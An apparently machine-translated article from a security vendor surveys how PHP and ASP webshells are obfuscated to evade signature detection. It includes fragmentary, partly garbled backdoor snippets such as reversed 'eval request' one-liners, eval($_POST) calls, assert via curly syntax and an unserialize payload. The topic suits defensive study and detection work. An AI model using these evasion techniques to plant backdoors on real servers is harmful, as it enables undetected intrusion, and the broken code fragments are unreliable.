Unknown attack Yizhi anti--Webshell deformation technology highlights
This article mainly analyzes and refines the Web Shell deformation technology.
0x1: Use string deformation technology to change hidden signatures
The traditional shell kill-free method uses string functions and string operators to segment, encode, and deform strings multiple times, and then assemble them into backdoor code for execution.
Simple string Deformation
<% Function MorfiCoder (Code) MorfiCoder = Replace (StrReverse (Code), "/*/", ")," \ * \ ", vbCrlf) end Function Execute MorfiCoder (")/*/z/*/(tseuqer lave") %>
This code sets "eval request (/*/z/*/)" in reverse order to ")/*/z/*/(tseuqer lave" to avoid scanning and killing signatures, when a script is accessed, its code will be dynamically decoded and restored to the original one-sentence backdoor. currently, more than 90% of unknown and deformed backdoors use this dynamic decoding technology.
Complex string combinations
// After a series of complex decoding operations, $ Q stores all the backdoor code $ Q = str_replace ('Do ', '', $ B. $ w. $ K. $. $ H. $ I. $. $ M. $ t. $ f. $ S); // $ y => create_function $ P = $ y ('', $ Q); $ P (); // Finally, the backdoor execution can be triggered by dynamically creating and calling the function variable $ P.
0x2: Deformation Using Operators
Operators exist in most scripting languages. Different operators correspond to different objects and have different operation functions, which makes code deformation more available.
Bitwise operators in PHP
These operators can all operate on strings !!!
The retrieved backdoor code is completely unidentifiable with simple bitwise inversion.
The combination of more operators causes the pattern to be completely unfixed and extremely flexible.
0x3: Distributed Data Pattern
The traditional one-sentence Trojan can be easily detected and killed. However, after multiple code variants, it becomes difficult to identify with the naked eye. Unless you use a dedicated tool, it is difficult to analyze the original code.
Principle: Import external data into a specific data structure, and then extract the variables in a specific way to combine them into attack code to scatter feature identifiers.
Simple array deformation
$ _ GET ["a"]); echo eval ($ _ ["exp"]);?>
Because of its flexibility, PHP and other scripting languages make it more difficult to identify variable names. Attackers can put input parameters into an array and then assign values to these confusing variable names, finally, call.
Complex array deformation
Eval ($ _ POST [x]);?>
Keywords are stored in arrays, extracted and combined into key function names, and called through variable functions. A feature of this type of deformation script is "anti-human ". It is very different from normal web scripts, so to some extent it is also the easiest to identify.
0x4: Increase complexity with built-in language deformation Functions
The more functions the language has, the more powerful the function will be, and the easier the code deformation will be. Multiple function mixing and encoding conversion are the basis of obfuscation encryption algorithms for various code casings.
Str_rot13 Deformation
Base64 encryption and decryption
',' "; Return $ encode;} function phpdecode ($ code) {$ code = str_replace (array (' '), Array ('',''), $ code); $ decode = base64_decode ($ code ); $ decode = @ gzinflate ($ decode); return $ decode;}?>
Urlencode encryption and conversion
Utf8_encode
There are thousands of transcoding codes, and the combination method is ever-changing. At present, most of the encryption software on the market is based on this and further encrypted. The reason is that it is non-scalable, pure green, widely used, and highly obfuscated. In addition, the cyclic detection mechanism can be extremely complex, making it widely used in shell-free shell.
Let's take a look at the comparison chart before and after encryption:
It cannot be identified by the naked eye, but it can still be accurately analyzed and eliminated by the "Xiaotian" engine of the dongle.
0x5: Use custom functions to increase Code complexity
With the custom encryption and decryption function, you can perfectly hide various signatures. This type of encryption is widely used in Trojan encryption.
Common examples include reversible encryption and irreversible encryption.
Reversible Encryption, as shown in. the encryption code is only used to bypass the scanning and removal of the signature. After the shell itself is obtained, the original text can be obtained through targeted decryption functions.
Irreversible encryption, that is, through asymmetric encryption algorithms such as DES and RSA, after the shell full text is encrypted, the attacker decrypts the shell plaintext through the private key submitted by the user end during access, and then continues to execute. in this way, even if the encrypted shell is intercepted, the original shell text cannot be analyzed.
0x6: increases the recognition complexity using language features
Some unique features and functions of languages can be used for code obfuscation. Because PHP has many features, only a few common ones are listed here.
Regular Expression replacement function Execution Code
Preg_replace function prototype:
Mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])
The/e modifier enables preg_replace () to treat the replacement parameter as PHP
Code execution.
Syntax features
Code execution in curly brackets
"Assert"); $ a = "$ {$ tk [" a "] ($ _ GET [a])}";?>
Exploitation of Curly Syntax Vulnerability
Constant
Dynamic Function Creation
Serialization and deserialization
Vul) ;}} unserialize ($ _ GET ['name']);?> Index. php? Name = O: 7: "Example": 1: {s: 3: "var"; s: 10: "phpinfo ();";}
0x7: use advanced syntax features
Advanced syntax features increase programmer productivity while providing more convenience for hackers.
Reflection mechanism
Place the backdoor code in/**/comments, obtain it using the class reflection mechanism, and finally execute dynamic functions. This method is powerful because the code exists in any format and is extremely flexible with no line restrictions.
Class
The operation is encapsulated into a normal class and then called, which is basically the same as the normal code. The difficulty of detection and removal is further improved.
Summary: from simple string deformation to complex random string generation and combination, from single-file Trojan to multi-file encapsulation and calling; from recognizable one sentence to multi-encrypted asymmetric backdoors on the network; from script-based function stacked backdoors to container-based hierarchical remote control. With the emergence of more and more new technologies, the features and usage of webshell will become more and more harmful. Security dogs believe that they can better cope with future hacker attacks only through dynamic confrontation and dynamic learning mechanisms.